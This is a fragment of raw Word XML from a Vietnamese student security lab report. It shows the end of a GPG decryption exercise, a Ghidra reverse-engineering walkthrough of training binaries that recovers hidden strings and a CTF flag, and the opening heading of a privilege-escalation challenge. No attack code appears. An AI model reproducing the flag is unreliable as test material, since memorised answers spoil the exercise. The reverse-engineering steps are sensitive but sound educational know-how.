                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5738692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Bước 2: đưa message.gpg vào để giải mã</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A277B0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53D88A0C" wp14:editId="3534BEAF">
            <wp:extent cx="5731200" cy="977900"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="4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731200" cy="977900"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="47A77E4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Bước 3: Kết quả</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FA54A1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43840EA0" wp14:editId="3C31DBCE">
            <wp:extent cx="5731200" cy="774700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="4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731200" cy="774700"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0318CA80" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="360" w:firstLine="206"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
        </w:rPr>
        <w:t>3.1.9. Kết luận, rút kinh nghiệm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="691D3823" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60"/>
        <w:ind w:left="850" w:hanging="283"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Mã hoá là phần cốt yếu của bảo mật, đảm bảo tính an toàn, bí mật và toàn vẹn cho dữ liệu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20FF73EE" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="850" w:hanging="283"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Kĩ thuật hash được ứng dụng cho quá trình mã hoá dữ liệu, chữ ký số, chữ ký điện tử</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="030F3A72" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="850" w:hanging="283"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Việc sử dụng mật khẩu cần có tính phức tạp, mặc dù có hash nhưng vẫn có những công cụ để crack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A41D7BD" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="006F1FD5">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4AFE73EF" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="86" w:name="_Toc90050782"/>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>3.2. Basic Malware RE</w:t>
      </w:r>
      <w:bookmarkEnd w:id="86"/>
    </w:p>
    <w:p w14:paraId="1EB27590" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="0"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="87" w:name="_Toc90050783"/>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>3.2.1. Yêu cầu</w:t>
      </w:r>
      <w:bookmarkEnd w:id="87"/>
    </w:p>
    <w:p w14:paraId="3F54D1B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Sử dụng phần mềm </w:t>
      </w:r>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Ghidra</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> để dịch ngược chương trình</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33FDCFAA" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="0"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="88" w:name="_Toc90050784"/>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>3.2.2. Công cụ</w:t>
      </w:r>
      <w:bookmarkEnd w:id="88"/>
    </w:p>
    <w:p w14:paraId="2B148E7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hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Phần mềm Ghidra để dịch ngược chương trình</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EAA3FAD" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>- Text converter để chuyển từ Hex sang ASCII</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74599E85" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="0"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="89" w:name="_Toc90050785"/>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>3.2.3. Các bước thực hiện</w:t>
      </w:r>
      <w:bookmarkEnd w:id="89"/>
    </w:p>
    <w:p w14:paraId="2D2349E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sk 2:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD6166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Import chương trình string1.exe_ vào Ghidra</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59273DB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Điều cần quan tâm là cần tìm hàm main, nhưng ở đây không có hàm main, ta chú ý tới hàm entry, hàm này có thể là điểm bắt đầu của chương trình</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5176B74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Khi vào đoạn code của hàm entry, ta thấy ngay phần text được dùng hàm md5_hash để mã hoá. Từ đây chúng ta dò ra đoạn String cần tìm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5262AC1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5FCA32D8" wp14:editId="6B0D6D78">
            <wp:extent cx="5731200" cy="3048000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="4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5731200" cy="3048000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E709AC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Ta có vị trí chứa đoạn text</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30EF063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7D2D8F19" wp14:editId="57D7B1AF">
            <wp:extent cx="5731200" cy="3035300"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="4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731200" cy="3035300"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CCDFC6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ết quả</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="655859B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08C86D4E" wp14:editId="0C15FDF0">
            <wp:extent cx="5731200" cy="1485900"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="4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7"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731200" cy="1485900"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="09760BE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sk 3:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10B3A1F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Phần code hàm entry được dịch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="565A578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42BBA74B" wp14:editId="340DD08C">
            <wp:extent cx="2795588" cy="3452883"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="4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795588" cy="3452883"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="11065EB5" wp14:editId="3C6C030C">
            <wp:extent cx="2805113" cy="3445410"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="4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2805113" cy="3445410"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="62DCB01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16BDAD2B" wp14:editId="05A8FAE1">
            <wp:extent cx="2827734" cy="3452813"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="4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2827734" cy="3452813"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="3EAD3C51" wp14:editId="16EFBA35">
            <wp:extent cx="3228320" cy="1338263"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="4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3228320" cy="1338263"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="475CE26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Đầu tiên, chương trình được bắt đầu với một biến char và sau đó là một loạt các biến không xác định. Cuối cùng là một biến con trỏ ký tự local_8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5165BCF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Nhìn vào phần code assambly, ta thấy được thứ tự của cái biến được thêm vào Stack, dễ thấy biến local_8 là biến con trỏ đầu tiên được thêm vào</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47102B9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Chúng ta có thể thấy rằng mỗi biến được gán một giá trị. Biến char đầu tiên là local_2c được gán cho giá trị ‘F’ và tất cả các biến không xác định đều được gán giá trị hex.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52665A5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05C74160" wp14:editId="4823A33E">
            <wp:extent cx="5731200" cy="3035300"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="4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731200" cy="3035300"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Tiếp theo, biến local_8 được gán giá trị là một giá trị băm của một chuỗi ký tự bắt đầu từ địa chỉ bộ nhớ của biến local_2a. Như vậy hàm băm sẽ băm cái kí tự từ cuối Stack lên đầu Stack, những giá trị Hex chúng ta sẽ chuyển qua dạng mã ASCII</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BA389F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Đoạn mã Hex ghép từ các biến theo thứ tự: 4c41477b535441434b2d535452494e47532d4152452d424553542d535452494e47537d</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BF015C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Sử dụng công cụ hỗ trợ để chuyển đoạn Hex sang mã ASCII</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14805FB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1A3A512D" wp14:editId="4A48E20C">
            <wp:extent cx="4264211" cy="3633788"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="4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4264211" cy="3633788"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BE4C2F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 xml:space="preserve">Kết quả String3: FLAG{STACK-STRINGS-ARE-BEST-STRINGS} </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3217CB7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sk 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55E4FF8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Chương trình khi được dịch ngược có code như hình</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D2C98F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Để ý các hàm FindResourceA() và LoadStringA()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F5264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Hàm LoadStringA() sẽ đưa chuỗi từ một địa chỉ tham chiếu tới cho biến stack0xfffffb5c.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51CA56D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Giá trị 0x110 là giá trị để xác định chuỗi được gán vào biến stack0xfffffb5c (biến local4a4). 0x110h = 172d</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A73842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6914B0C3" wp14:editId="59CE10D7">
            <wp:extent cx="5731200" cy="3035300"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="4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5731200" cy="3035300"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CA094A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Dựa vào giá trị 272 ta tìm được string có ID = 272 chính là String cần tìm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5774442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5168E670" wp14:editId="405D4AD4">
            <wp:extent cx="5731200" cy="3238500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="4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731200" cy="3238500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="22686D4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560C6F52" wp14:editId="3617817E">
            <wp:extent cx="5731200" cy="1473200"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="4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5731200" cy="1473200"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B3625F3" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
        </w:rPr>
        <w:t>3.2.4. Kết luận</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="075AA23D" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
        </w:rPr>
        <w:t>Kiến thức có được</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B0EB229" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:before="60"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Có kiến thức về dịch ngược chương trình</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD5AAFB" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Biết cách sử dụng chương trình GHidra để dịch ngược 1 chương trình</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="490D4217" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:after="60"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Có thể dùng kĩ thuật dịch ngược để phân tích một Malware đơn giản</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CAD3D35" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Kinh nghiệm rút ra:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D11CD5B" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:spacing w:before="60"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Khi xây dựng ứng dụng cần có biện pháp chống dịch ngược để ngăn chặn hành vi Crack hoặc nghiên cứu khai thác những nội dung, tài nguyên bí mật hoặc bị khai thác lỗ hỏng bảo mật</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EFFF140" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:spacing w:after="60"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Kĩ năng quan sát và phán đoán, có hiểu biết về luồng dữ liệu của ứng dụng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BD7123E" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="90" w:name="_Toc90050786"/>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>3.3. Thử thách Wonderland (Leo thang đặc quyền)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="90"/>
    </w:p>
    <w:p w14:paraId="34E3C73D" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00B53014" w:rsidRDefault="001F7EFA" w:rsidP="00B53014">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="91" w:name="_Toc90050787"/>
      <w:r w:rsidRPr="00B53014">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>3.3.1. Công cụ sử dụng</w:t>
      </w:r>
      <w:bookmarkEnd w:id="91"/>
